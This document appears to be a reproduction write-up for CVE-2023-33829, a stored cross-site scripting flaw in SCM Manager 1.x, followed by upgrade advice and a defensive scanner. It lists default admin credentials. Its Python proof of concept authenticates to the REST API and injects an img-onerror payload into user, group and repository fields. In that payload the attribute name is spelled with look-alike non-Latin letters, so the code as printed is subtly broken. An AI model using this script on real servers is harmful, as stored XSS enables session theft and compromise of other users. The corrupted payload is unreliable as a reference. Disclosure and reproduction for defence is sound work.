1. Vulnerability description
Vulnerability brief
SCM-Manager is open source repository management software that supports Subversion, Mercurial and Git repositories. It is simple to install and rich in features: it provides permission management for users and user groups and has extensive plug-in support. Because it is released under the MIT license it may be used commercially, and its code is available on GitHub. The project was initially used for research purposes only; from version 2.0 it was taken over by Cloudogu, which uses it to manage and develop its own code bases and offers professional enterprise-level support to companies.
This vulnerability allows attackers to exploit code flaws in the description fields of several functions: a crafted payload stored in such a field is later rendered by the application, enabling XSS attacks.
Vulnerability scope
Provider : Cloudogu
Product : SCM Manager
Affected versions (confirmed): SCM Manager 1.2 up to and including 1.60
Fixed in: versions later than 1.60; the latest version is 2.43.1
2. Vulnerability reproduction in practice
Environment setup
docker image:
https://bitbucket.org/sdorra/docker-scm-manager/src/master/
Build with a shell script
shell:
#!/bin/bash
mkdir /var/lib/scm
chown 1000:1000 /var/lib/scm
docker run -v /var/lib/scm:/var/lib/scm -p 8080:8080 sdorra/scm-manager
Reproduction
On first access to SCM Manager, authentication is required.
Username: scmadmin   Password: scmadmin
Repositories
This vulnerability can be exploited through the Description field of the repository function.
Create a new repository and enter the payload in its Description field.
Git type:
Subversion type:
Users
This vulnerability can be exploited through the Display Name field of the user function.
Create a new user and enter the payload in its Display Name field.
The Display Name attribute of the newly created account renders abnormally, showing that the XSS payload was stored and executed successfully.
Groups
This vulnerability can be exploited through the Description field of the group function.
Alternatively, the three fields can be populated at once with the following POC.
POC:
import requests
import argparse
import sys

# Command-line arguments
parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')
parser.add_argument("-u", "--user", required=True, help="Admin user or user with write permissions")
parser.add_argument("-p", "--password", required=True, help="Password of the user")
args = parser.parse_args()

# Credentials: read from the parsed arguments rather than fixed sys.argv
# positions, so the options work in any order and with the long forms
user = args.user
password = args.password

# Global variables
main_url = "http://localhost:8080/scm"  # Change the URL if necessary
auth_url = main_url + "/api/rest/authentication/login.json"
users = main_url + "/api/rest/users.json"
groups = main_url + "/api/rest/groups.json"
repos = main_url + "/api/rest/repositories.json"

# Create a session so the authentication cookie is reused by later requests
session = requests.Session()

# Credentials to send
post_data = {
    'username': user,
    'password': password
}
r = session.post(auth_url, data=post_data)
if r.status_code == 200:
    print("[+] Authentication successful")
else:
    print("[-] Failed to authenticate")
    sys.exit(1)

# User: the payload is stored in the Display Name field
new_user = {
    "name": "newUser",
    "displayName": "<img src=x οnerrοr=alert('XSS')>",
    "mail": "",
    "password": "",
    "admin": False,
    "active": True,
    "type": "xml"
}
create_user = session.post(users, json=new_user)
if create_user.ok:
    print("[+] User with XSS payload created")
else:
    print("[-] Failed to create user (HTTP %d)" % create_user.status_code)

# Group: the payload is stored in the Description field
new_group = {
    "name": "newGroup",
    "description": "<img src=x οnerrοr=alert('XSS')>",
    "type": "xml"
}
create_group = session.post(groups, json=new_group)
if create_group.ok:
    print("[+] Group with XSS payload created")
else:
    print("[-] Failed to create group (HTTP %d)" % create_group.status_code)

# Repository: the payload is stored in the Description field
new_repo = {
    "name": "newRepo",
    "type": "svn",
    "contact": "",
    "description": "<img src=x οnerrοr=alert('XSS')>",
    "public": False
}
create_repo = session.post(repos, json=new_repo)
if create_repo.ok:
    print("[+] Repository with XSS payload created")
else:
    print("[-] Failed to create repository (HTTP %d)" % create_repo.status_code)
3. Fix
It is recommended to update to the latest version of SCM Manager, currently 2.43.1.
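Before and after upgrading, a defender will want to know whether any user, group or repository already carries a stored payload in the fields the POC writes to. The scanner below is an added example (not part of the original article or of SCM Manager): it assumes JSON records in the shape the POC sends to users.json, groups.json and repositories.json, the function and constant names are its own, and the sample records are constructed for this example.

```python
import html
import re

# Injectable fields per REST collection, as identified in this write-up.
WATCHED_FIELDS = {
    "users.json": ("displayName",),
    "groups.json": ("description",),
    "repositories.json": ("description",),
}

# Matches an HTML tag or an inline event-handler attribute (onerror=, onload=, ...).
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>|\bon[a-z]+\s*=", re.IGNORECASE)


def find_stored_payloads(collection: str, records: list) -> list:
    """Return (record name, field, value) for every watched field of the
    given collection whose value contains markup. Run it over an export of
    each collection to find objects that already hold a stored payload."""
    hits = []
    for rec in records:
        for field in WATCHED_FIELDS.get(collection, ()):
            value = rec.get(field) or ""
            if TAG_RE.search(value):
                hits.append((rec.get("name", "?"), field, value))
    return hits


def safe_render(value: str) -> str:
    """What a fixed UI should emit for such a field: the value HTML-escaped,
    so the browser shows it as text instead of parsing it as markup."""
    return html.escape(value, quote=True)


# Constructed sample records (hypothetical, same shape as the REST payloads).
SAMPLE_USERS = [
    {"name": "scmadmin", "displayName": "SCM Administrator"},
    {"name": "newUser", "displayName": "<img src=x onerror=alert('XSS')>"},
]
SAMPLE_GROUPS = [
    {"name": "devs", "description": "Developers"},
    {"name": "newGroup", "description": "<b>bold description</b>"},
]

if __name__ == "__main__":
    for coll, recs in (("users.json", SAMPLE_USERS), ("groups.json", SAMPLE_GROUPS)):
        for name, field, value in find_stored_payloads(coll, recs):
            print(f"[!] {coll} {name}.{field}: {value!r} -> render as {safe_render(value)}")
```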
4. Conclusion
This article describes the reproduction of the SCM Manager XSS vulnerability CVE-2023-33829. The vulnerability arises because attackers can exploit code defects in the description fields of several of its functions to construct payloads and carry out XSS attacks.
The lesson of this vulnerability is that sensitive functions should not repeatedly call code written for non-sensitive purposes, that user-supplied data must be filtered and validated, and that the necessary security testing must be carried out.